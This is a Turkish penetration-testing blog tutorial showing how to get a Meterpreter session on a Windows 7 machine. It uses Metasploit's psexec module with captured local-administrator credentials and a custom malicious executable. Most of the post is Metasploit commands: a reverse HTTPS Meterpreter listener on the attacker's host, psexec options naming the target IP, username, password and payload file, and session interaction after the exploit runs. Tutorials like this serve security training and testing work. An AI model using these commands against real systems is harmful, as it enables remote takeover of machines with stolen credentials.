MSF psexec İstismar Modülü, Özel Olarak Hazırlanmış Zararlı Uygulama ve Elde Edilen Kimlik Bilgileri ile Windows Bir Bilgisayarlara Meterpreter Bağlantısı Elde Edilmesi

Sızma testleri sırasında, bir şekilde elde edilen kimlik bilgileri (kullanıcı adı ve parola / parola özeti) kullanılarak Windows bilgisayarlara erişim sağlanmaya çalışılır. Bu yazıda erişim bilgileri (IP, kullanıcı adı, parolası veya parola özeti) elde edilmiş bir Windows bilgisayara MSF psexec istismar modülü ile özel olarak hazırlanmış bir zararlı uygulama kullanılarak Meterpreter bağlantısı gerçekleştirilecektir.

Bu yazıda kullanılacak Kali bilgisayarın IP adresi 192.168.100.250, kurbana ait Windows 7 makinenin IP adresi ise 192.168.100.120 olduğu ve Windows 7 bilgisayarda yerel yönetici olan hesabın kullanıcı adının “Levent”, parolasının ise “Ll123456¨ olarak tespit edildiğini varsayalım.

Meterpreter komut satırı elde etmek için ve saldırgana ait Kali bilgisayara ters HTTPS Meterpreter bağlantısı kuracak olan zararlı bir uygulama dosyasının oluşturulduğunu ve /root/Desktop dizinine kaydedildiğini varsayalım. Bu uygulama MSF psexec istismar modülüne parametre olarak verilecek ve çalışması sağlanacaktır.

Oluşturulan uygulamanın gerçekleştireceği ters HTTPS Meterpreter bağlantısını dinleyecek olan MSF multi-handler istismar modülü aşağıdaki gibi ayarlanabilir.

use exploit/multi/handler
show options
set PAYLOAD windows/meterpreter/reverse_https
set ExitOnSession false
set LHOST 192.168.100.250
set LPORT 443
exploit -j

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-exploit-module-01

MSF psexec istismar modülünün genel seçenekleri aşağıdaki gibi listelenebilir.

search psexec platform:windows type:exploit
use exploit/windows/smb/psexec
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-exploit-module-02

Windows bilgisayarda yerel yönetici haklarına sahip olan ve kimlik bilgileri elde edilen kullanıcı hakları ile Kali bilgisayarın /root/Desktop dizinindeki zararlı uygulamanın MSF psexec istismar modülü ile çalıştırılması aşağıdaki gibi ayarlanabilir:

set RHOST 192.168.100.120
set SMBUser Levent
set SMBPass Ll123456
set EXE::Custom /root/Desktop/ZararliUygulama.exe
set DisablePayloadHandler true
show options

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-exploit-module-03

İpucu: MSF psexec modülü ile varsayılan olarak gelen PAYLOAD yerine özel olarak oluşturulan uygulamanın sağladığı PAYLOAD’un kullanılması için DisablePayloadHandler seçeneğinin true olarak ayarlanması gerekmektedir.

Modül seçenekleri ayarlandıktan sonra, modül çalıştırılır ve zararlı uygulamanın çalıştırılması sağlanır.

exploit

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-exploit-module-04

Böylece, MSF multi-handler istismar modülü üzerinde gelen talep yakalanmıştır.

sessions -i 1
getuid
getpid

obtaining-meterpreter-session-by-using-obtained-authentication-informations-and-custom-exe-via-msf-psexec-exploit-module-05

Not: MSF psexec istismar modülüne parametre olarak özel olarak hazırlanmış zararlı bir yazılım verilmesi yöntemi ile elde edilen meterpreter bağlantısı çok sağlıklı çalışmamaktadır. Bu sebeple, başka yöntemlerin tercih edilmesi tavsiye edilmektedir.

 

Uploading and Executing undetectable payload using PSEXEC Exploit

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.